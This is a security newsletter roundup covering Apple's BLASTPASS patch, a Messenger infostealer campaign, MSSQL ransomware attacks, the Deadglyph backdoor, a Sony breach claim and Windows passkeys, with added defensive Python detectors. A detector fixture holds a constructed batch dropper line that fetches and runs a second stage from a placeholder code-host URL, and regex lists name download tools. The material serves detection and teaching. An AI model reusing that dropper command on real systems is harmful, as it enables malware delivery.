Apple Security Updates iMessage Zero-click

Summary: Apple has released a security patch for two zero-day vulnerabilities affecting iPhones. The vulnerabilities, discovered by Citizen Lab at the University of Toronto’s Munk School and by Apple, are part of a zero-click exploit chain known as BLASTPASS, which lets threat actors send malicious attachments that deploy NSO Group’s Pegasus spyware without any interaction from the victim. The vulnerabilities are CVE-2023-41061 and CVE-2023-41064:

  • CVE-2023-41061 – A validation issue in Apple Wallet that could lead to arbitrary code execution when handling maliciously crafted attachments.
  • CVE-2023-41064 – A buffer overflow issue in Image I/O that could lead to arbitrary code execution when processing maliciously crafted images.

Citizen Lab stated that the latest version of iOS at the time (16.6) was vulnerable to these attacks and that the exploit “involved PassKit attachments containing malicious images sent from an attacker iMessage account to the victim.” Apple released security patches for vulnerable devices beyond iPhones, including:

  • iOS 16.6.1 and iPadOS 16.6.1 – iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later
  • macOS Ventura 13.5.2 – Macs running macOS Ventura
  • watchOS 9.6.2 – Apple Watch Series 4 and later

Why it matters: A zero-click exploit requires no user interaction, so a target can be compromised simply by receiving a message, and these vulnerabilities were being actively exploited in the wild before the patch shipped. Because the victim never has to open or click anything, the usual user-awareness training offers no protection against this attack. With Apple holding the second-largest mobile market share in the world, millions of users are exposed. Given the severity of the vulnerabilities, all Apple users should update their devices without delay.

Vietnamese Facebook Messenger Scam

Summary: A Vietnamese threat actor has built a botnet of fake and compromised Facebook accounts that spreads a malicious, Python-based information stealer through Facebook Messenger, targeting the owners of Facebook Business accounts. The actor abuses Messenger’s file-sharing feature by packaging the payload in a .rar or .zip archive. The archive contains a single Windows batch file that downloads further malicious components from GitHub or GitLab. The downloaded files then attempt to steal information such as session cookies and login credentials stored on the user’s computer and in the web browser.
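The lure described above has a recognisable shape: an archive holding a lone batch file that pulls its next stage from a public code host. The following Python triage check is an added example, not code from the original report or from the threat actor; it builds a constructed sample .zip in memory (the batch content is illustrative, not a real sample) and flags archives that match the pattern. Only ZIP is handled because the standard library cannot read RAR; the host and command lists are assumptions a defender would tune to their environment.

```python
import io
import re
import zipfile

# Constructed sample: a lone .bat that fetches a second stage from a code host.
# Illustrative only; not taken from a real campaign.
LURE_BAT = (
    "@echo off\r\n"
    "powershell -w hidden -c \"iwr https://raw.githubusercontent.com/example/repo/main/stage2.py "
    "-o %TEMP%\\s.py\"\r\n"
    "%TEMP%\\python\\python.exe %TEMP%\\s.py\r\n"
)

def build_sample_zip(name: str, body: str) -> bytes:
    """Create an in-memory ZIP with one member, so the example runs offline."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(name, body)
    return buf.getvalue()

# Public code hosts the campaign is reported to stage from (assumed list).
CODE_HOSTS = re.compile(r"https?://(?:[\w-]+\.)*(github(?:usercontent)?|gitlab)\.com/", re.I)
# Common Windows download primitives seen in droppers (assumed list).
DOWNLOAD_CMDS = re.compile(
    r"\b(curl|wget|bitsadmin|certutil|iwr|invoke-webrequest|downloadstring|downloadfile)\b", re.I
)
SCRIPT_EXT = (".bat", ".cmd")

def triage_archive(data: bytes) -> dict:
    """Return indicators for a ZIP attachment: lone script, download commands, code-host URLs."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        members = [i for i in zf.infolist() if not i.is_dir()]
        scripts = [i for i in members if i.filename.lower().endswith(SCRIPT_EXT)]
        text = "".join(zf.read(i).decode("utf-8", errors="replace") for i in scripts)
    return {
        "file_count": len(members),
        "lone_script": len(members) == 1 and len(scripts) == 1,
        "download_cmds": sorted({m.group(1).lower() for m in DOWNLOAD_CMDS.finditer(text)}),
        "code_hosts": sorted({m.group(1).lower() for m in CODE_HOSTS.finditer(text)}),
    }

def verdict(indicators: dict) -> str:
    """Block the exact lure shape; send anything else with download behaviour to review."""
    if indicators["lone_script"] and indicators["code_hosts"]:
        return "block"
    if indicators["download_cmds"] or indicators["code_hosts"]:
        return "review"
    return "allow"

if __name__ == "__main__":
    sample = build_sample_zip("Sales_Report_Q3.bat", LURE_BAT)
    print(triage_archive(sample), verdict(triage_archive(sample)))
```

The check is deliberately narrow: a single script member whose text references GitHub or GitLab is blocked outright, while any other download command only earns a review. Extending it to nested archives and to .lnk or .vbs droppers is a natural next step.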

Owners of Facebook Business accounts are likely to have other accounts, such as business or e-commerce logins, saved on the same device; once the malicious file runs, the threat actor can gain access to those as well. This allows the threat actors not only to damage the victim’s finances but also to add the stolen accounts to their botnet.

Why it matters: While email remains the most common phishing channel, there is a growing trend of phishing through social media messaging. Many users have been trained to spot email phishing, but social media phishing adds a new layer of deception: attackers can create realistic profiles or use existing compromised ones, which makes it easier for them to gain the target’s trust and trick the target into downloading the malicious files. Users should be trained to recognise not only suspicious emails but also suspicious social media messages.

FreeWorld, a Not so Free Software

Summary: Poorly secured, internet-facing Microsoft SQL Servers are being targeted by threat actors to deploy Cobalt Strike payloads and FreeWorld ransomware. In the campaign, tracked as DB#JAMMER, the threat actors brute-force their way into Microsoft SQL Server logins and then use the database’s xp_cmdshell feature to run operating-system commands on the compromised host.

The attackers first tried to establish persistence on the host over RDP before pivoting to AnyDesk, a legitimate remote-access tool. After gaining access they deploy enumeration tools, RAT payloads, exploitation and credential-stealing software, Cobalt Strike, and FreeWorld, a variant of the Mimic ransomware. They also set up command-and-control on the host and drop a .txt file containing the ransom note.
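The two things a defender most wants to see in this campaign both land in the SQL Server ERRORLOG: a burst of failed logins from one client, and xp_cmdshell being switched on. The following Python detector is an added example, not code from the original report or from the threat actors; it runs over a constructed ERRORLOG excerpt (the addresses, timestamps and SPIDs are made up, but the message formats are those SQL Server writes) and raises an alert at a configurable threshold of failures per client within a time window, a follow-on alert if that client then logs in successfully, and a standalone alert when the configuration change is logged.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed ERRORLOG excerpt (not from a real incident): a password-guessing burst
# against 'sa' from one client, a success, then xp_cmdshell being enabled.
SAMPLE_LOG = """\
2023-09-01 02:14:07.55 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2023-09-01 02:14:08.01 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2023-09-01 02:14:08.47 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2023-09-01 02:14:08.93 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2023-09-01 02:14:09.38 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2023-09-01 02:14:09.84 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2023-09-01 02:14:12.40 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 203.0.113.5]
2023-09-01 02:21:40.03 spid58      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2023-09-01 09:00:00.00 Logon       Login failed for user 'app_ro'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.7]
"""

LINE = re.compile(r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d\d) (?P<src>\S+)\s+(?P<msg>.*)$")
FAILED = re.compile(r"Login failed for user '(?P<user>[^']*)'.*\[CLIENT: (?P<ip>[^\]]+)\]")
SUCCESS = re.compile(r"Login succeeded for user '(?P<user>[^']*)'.*\[CLIENT: (?P<ip>[^\]]+)\]")
XP_CMDSHELL_ON = re.compile(r"Configuration option 'xp_cmdshell' changed from 0 to 1")

def parse(log: str):
    """Yield (timestamp, message) for each well-formed ERRORLOG line."""
    for raw in log.splitlines():
        m = LINE.match(raw)
        if m:
            yield datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"), m["msg"]

def detect(log: str, threshold: int = 5, window: timedelta = timedelta(minutes=5)) -> list:
    """Return (kind, client_ip, detail) alerts in log order."""
    alerts = []
    recent = defaultdict(deque)   # client ip -> timestamps of failures inside the window
    flagged = set()               # clients already reported for brute force
    for ts, msg in parse(log):
        m = FAILED.search(msg)
        if m:
            q = recent[m["ip"]]
            q.append(ts)
            while q and ts - q[0] > window:   # slide the window forward
                q.popleft()
            if len(q) >= threshold and m["ip"] not in flagged:
                flagged.add(m["ip"])
                alerts.append(("brute_force", m["ip"],
                               f"{len(q)} failed logins (last user '{m['user']}') within {window}"))
            continue
        m = SUCCESS.search(msg)
        if m and m["ip"] in flagged:
            alerts.append(("brute_force_success", m["ip"], f"login succeeded as '{m['user']}' after failures"))
            continue
        if XP_CMDSHELL_ON.search(msg):
            # No client address on this line; it is high severity on its own.
            alerts.append(("xp_cmdshell_enabled", None, msg))
    return alerts

if __name__ == "__main__":
    for kind, ip, detail in detect(SAMPLE_LOG):
        print(kind, ip, detail)
```

Successful-login lines only appear when login auditing is set to record successes as well as failures, so the second alert depends on that server setting. On the hardening side, `EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;` turns the feature back off, and the same ERRORLOG message with “changed from 1 to 0” confirms it.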

Why it matters: This campaign shows the danger of exposing database servers directly to the internet. Any reachable system is a potential target, and an exposed, weakly authenticated one is far more likely to be hit. Microsoft SQL Server’s large market share gives the threat actors a correspondingly large pool of potential victims, and a ransomware incident can cost a company millions of dollars. Companies should keep database servers off the public internet, enforce strong authentication, and leave xp_cmdshell disabled unless it is explicitly required.

Deadglyph: Stealthy Malware Used in Government Attacks


Summary: Deadglyph is a new modular backdoor attributed to Stealth Falcon APT (aka Project Raven or FruityArmor), a state-sponsored hacking group from the United Arab Emirates (UAE). So far it has been observed conducting cyber espionage against a government agency in the Middle East. The group has been known for targeting activists, journalists, and dissidents for almost a decade. According to ESET’s report: “Deadglyph’s architecture is unusual as it consists of cooperating components – one a native x64 binary, the other a .NET assembly. This combination is unusual because malware typically uses only one programming language for its components. This difference might indicate separate development of those two components while also taking advantage of unique features of the distinct programming languages they utilize.”

Unlike traditional backdoors, Deadglyph does not carry its commands built in: it receives them from an actor-controlled server in the form of additional modules, which allow it to create new processes, read files, and collect information from the compromised system. The split across two programming languages is likely a deliberate choice to hinder analysis. Deadglyph’s loading chain begins with a registry shellcode loader (a DLL) that extracts encrypted shellcode from the Windows Registry; the shellcode loads the Executor (native x64) component, which in turn loads the Orchestrator (.NET) component. Only the initial loader exists on disk as a DLL file, and the later stages are kept encrypted in the Registry, which both reduces the chance of detection and makes analysis more difficult.

Why it matters: Because the loader DLL is the one component stored on the filesystem, it is the most exposed to detection. To blend in, the threat actors used a homoglyph attack in the DLL’s VERSIONINFO resource, substituting visually identical Greek and Cyrillic Unicode characters into strings that mimic Microsoft’s version information so the file appears to be a legitimate Windows binary. ESET reported this tactic in the context of Stealth Falcon, but it is cheap and effective, so other threat actors may well adopt it; checking version-info strings for mixed scripts is a simple counter. The initial infection vector is still unknown, so keeping up with emerging threat reporting remains the main way to reduce the risk posed by this kind of tooling.
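The homoglyph trick only works because a human (or a string match) sees “Microsoft” where the bytes say otherwise. The following Python check is an added example, not code from ESET or from the malware; it takes VERSIONINFO strings that have already been extracted from a PE (extraction itself, for instance with a PE parser, is assumed to have happened) and flags any letter outside the Latin script, then folds a small, assumed confusables table to a Latin “skeleton” to decide whether the string is impersonating Microsoft. The sample strings are constructed: the Greek capital Mu and Cyrillic small o used here are illustrative, not the specific characters from the real sample.

```python
import unicodedata

# Constructed VERSIONINFO strings. The first two are what a genuine Microsoft binary
# carries; the other two swap in a Greek capital Mu (U+039C) and a Cyrillic small o (U+043E).
SAMPLES = {
    "legit_company": "Microsoft Corporation",
    "legit_product": "Microsoft\u00ae Windows\u00ae Operating System",
    "spoof_company": "\u039cicrosoft Corporation",
    "spoof_product": "Micr\u043esoft\u00ae Windows\u00ae Operating System",
}

# Assumed mini confusables table (Greek/Cyrillic letters that render like Latin ones).
# A production check would use the full Unicode confusables data instead.
CONFUSABLES = {
    "\u0391": "A", "\u0392": "B", "\u0395": "E", "\u0397": "H", "\u0399": "I", "\u039a": "K",
    "\u039c": "M", "\u039d": "N", "\u039f": "O", "\u03a1": "P", "\u03a4": "T", "\u03a7": "X",
    "\u03bf": "o",
    "\u0410": "A", "\u0412": "B", "\u0415": "E", "\u041a": "K", "\u041c": "M", "\u041d": "H",
    "\u041e": "O", "\u0420": "P", "\u0421": "C", "\u0422": "T", "\u0425": "X",
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c", "\u0443": "y",
    "\u0445": "x",
}

def find_non_latin(s: str) -> list:
    """Return (index, char, unicode name) for every letter whose script is not Latin."""
    hits = []
    for i, ch in enumerate(s):
        if ch.isalpha() and not unicodedata.name(ch, "").startswith("LATIN"):
            hits.append((i, ch, unicodedata.name(ch, "UNKNOWN")))
    return hits

def skeleton(s: str) -> str:
    """Map known look-alike letters to their Latin twin so strings can be compared by appearance."""
    return "".join(CONFUSABLES.get(ch, ch) for ch in s)

def check_versioninfo(value: str, vendor: str = "Microsoft") -> dict:
    """Flag a version-info string that looks like `vendor` but contains non-Latin letters."""
    hits = find_non_latin(value)
    looks_like_vendor = skeleton(value).startswith(vendor)
    return {
        "non_latin": hits,
        "impersonates_vendor": bool(hits) and looks_like_vendor,
    }

if __name__ == "__main__":
    for label, text in SAMPLES.items():
        print(label, check_versioninfo(text))
```

A string with no non-Latin letters passes regardless of content; a string that folds to “Microsoft…” but needed a script swap to get there is the signature of the trick. The same check applies to CompanyName, ProductName, OriginalFilename and the other VERSIONINFO fields.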

Ransomed.vc States ‘All Of Sony Systems’ Hacked

Summary: Ransomed.vc, a ransomware group that has been active since September 2023, has stated: “We have successfully compromissed [sic] all of sony systems. We wont ransom them! we will sell the data. due to sony not wanting to pay. DATA IS FOR SALE,” before declaring “WE ARE SELLING IT”. Ransomed.vc has also posted a file tree of the entire leak, which appears to contain fewer than 6,000 files, seemingly small for “all of Sony systems”. Included are “build log files”, a wide range of Java resources, and HTML files. No price is listed for the data, but Ransomed.vc has left contact details for the Tox messaging service, as well as Telegram and email details.

According to the actor’s post, the data will be published on September 28th if Sony does not pay by that date. “In cases where payment is not received, we are obligated to report a Data Privacy Law violation to the GDPR agency!” the group says on its leak site. Thus far, over 3.14 GB of uncompressed data allegedly belonging to Sony has been dumped on hacker forums. As of September 27th, Sony has made no official announcement of a breach but is investigating as a precaution given the number of claims.

Why it matters: Ransomed.vc appears to be both a ransomware operator and a ransomware-as-a-service organization; it is currently advertising for “affiliates” to sign up. Although the attack has not been confirmed by Sony, this threat actor’s capabilities appear to be growing, so it is imperative to keep track of emerging threats and to secure internet-facing resources to close off future avenues of attack. Users should also be made aware of new and emerging threats so that they safeguard passwords and corporate data, reducing both the risk of exposure and the attack surface.

Security Tip of the Month – Passkeys Coming to Windows 11

Summary: With the Windows 11 feature update released on September 26th, Microsoft is enabling passkeys across the operating system. In its September 21st announcement, Microsoft stated that over 4,000 password-related attacks happen every second and positioned this update as a step toward a passwordless future. From the release date, IT admins can remove the option to enter a password on devices that support Windows Hello for Business, so users sign in with facial recognition or a fingerprint (depending on user preference and device capability).

Until this update, Windows Hello was an option IT admins could offer; Microsoft is now actively pushing the move away from passwords. The change also extends to browsers such as Edge and Chrome, which can use the device’s biometric hardware to authenticate users to websites, removing the need to memorize passwords for web authentication as well. Once systems are updated (in environments where the feature is enabled), users will be prompted to create a passkey within Windows and can then use their face or fingerprint to authenticate to their PC and to any website that supports passkeys.
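What makes a passkey login resistant to phishing is not the biometric but the shape of the exchange: the site sends a one-time challenge, the browser records the page’s real origin, the authenticator only answers for the site (rpId) the credential was created for, and the site verifies origin, rpId and challenge before it accepts the signature. The following Python simulation is an added example, not Microsoft’s or any browser’s code, and it shows that exchange with all three parties. One simplification is flagged in the code: a real authenticator signs with a per-credential private key and the site holds only the public key, whereas this stand-in uses HMAC-SHA256 with a key shared at enrolment, so it demonstrates challenge and origin binding, not the public-key property. Browsers also refuse an rpId that is not a registrable suffix of the page’s domain; that rule is omitted here so the relying party’s own origin check is what gets exercised. All names and origins are made up.

```python
import hashlib
import hmac
import json
import secrets

class Authenticator:
    """Holds credentials scoped to an rpId and answers assertions only for that rpId."""
    def __init__(self):
        self._creds = {}  # rp_id -> (credential_id, key)

    def register(self, rp_id: str):
        cred_id, key = secrets.token_bytes(16), secrets.token_bytes(32)
        self._creds[rp_id] = (cred_id, key)
        return cred_id, key  # key is returned only because the HMAC stand-in needs it at the RP

    def get_assertion(self, rp_id: str, client_data_json: bytes):
        if rp_id not in self._creds:
            return None  # no credential for a look-alike domain: nothing to phish
        cred_id, key = self._creds[rp_id]
        auth_data = hashlib.sha256(rp_id.encode()).digest() + b"\x01"  # rpIdHash || flags (UP)
        to_sign = auth_data + hashlib.sha256(client_data_json).digest()
        # Stand-in for the ECDSA/EdDSA signature a real authenticator produces.
        sig = hmac.new(key, to_sign, "sha256").digest()
        return {"id": cred_id, "authenticatorData": auth_data,
                "clientDataJSON": client_data_json, "signature": sig}

class Browser:
    """Builds clientDataJSON from the page's actual origin; script on the page cannot alter it."""
    def __init__(self, authenticator: Authenticator, origin: str):
        self.authn, self.origin = authenticator, origin

    def get(self, rp_id: str, challenge: str):
        cd = {"type": "webauthn.get", "challenge": challenge, "origin": self.origin}
        return self.authn.get_assertion(rp_id, json.dumps(cd, separators=(",", ":")).encode())

class RelyingParty:
    """The website: issues one-time challenges and verifies every binding before accepting."""
    def __init__(self, rp_id: str, origin: str):
        self.rp_id, self.origin = rp_id, origin
        self.creds = {}      # credential id -> verification key
        self.pending = set() # outstanding challenges

    def enroll(self, cred_id: bytes, key: bytes):
        self.creds[cred_id] = key

    def challenge(self) -> str:
        c = secrets.token_urlsafe(32)
        self.pending.add(c)
        return c

    def verify(self, assertion) -> str:
        if assertion is None:
            return "no assertion"
        cd = json.loads(assertion["clientDataJSON"])
        if cd.get("type") != "webauthn.get":
            return "wrong ceremony type"
        if cd.get("origin") != self.origin:
            return "origin mismatch"
        if cd.get("challenge") not in self.pending:
            return "unknown or replayed challenge"
        ad = assertion["authenticatorData"]
        if ad[:32] != hashlib.sha256(self.rp_id.encode()).digest():
            return "rpIdHash mismatch"
        if not ad[32] & 0x01:
            return "user presence flag not set"
        key = self.creds.get(assertion["id"])
        if key is None:
            return "unknown credential"
        expected = hmac.new(key, ad + hashlib.sha256(assertion["clientDataJSON"]).digest(), "sha256").digest()
        if not hmac.compare_digest(expected, assertion["signature"]):
            return "bad signature"
        self.pending.discard(cd["challenge"])  # each challenge is accepted once
        return "ok"

def demo():
    """Run the legitimate login, a replay, and two phishing attempts from a look-alike origin."""
    rp = RelyingParty("bank.example", "https://bank.example")
    authn = Authenticator()
    cred_id, key = authn.register(rp.rp_id)
    rp.enroll(cred_id, key)
    good = Browser(authn, "https://bank.example").get(rp.rp_id, rp.challenge())
    result_ok = rp.verify(good)
    result_replay = rp.verify(good)
    c = rp.challenge()  # attacker relays a genuine challenge to the victim
    phish = Browser(authn, "https://bank-example.com")
    result_phished = rp.verify(phish.get("bank-example.com", c))  # authenticator has no such credential
    result_forged = rp.verify(phish.get(rp.rp_id, c))             # browser still records the real origin
    return result_ok, result_phished, result_forged, result_replay

if __name__ == "__main__":
    print(demo())
```

The two phishing cases fail at different layers: the first never produces an assertion because the authenticator has no credential scoped to the look-alike rpId, and the second produces one that the site rejects because the browser-supplied origin does not match. Compare that with a password, which the victim would have typed straight into the phishing page.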

Why it matters: Passwords carry inherent risk. Users tend to choose passwords that are easy to remember, and when they are forced to change them frequently they usually just increment the old one, so a compromised old password makes the new one easy to guess. Passwords must also be stored on the server side; even when they are hashed rather than kept in the clear, a stolen database can be cracked offline, and unsalted hashes can be reversed quickly with precomputed rainbow tables. A passkey, by contrast, never leaves the device as a reusable secret and is bound to the site it was created for, so a stolen server database or a phishing page yields nothing that can be replayed. This is why Microsoft, along with Apple and Google, supports passkeys and is pushing for a truly passwordless future.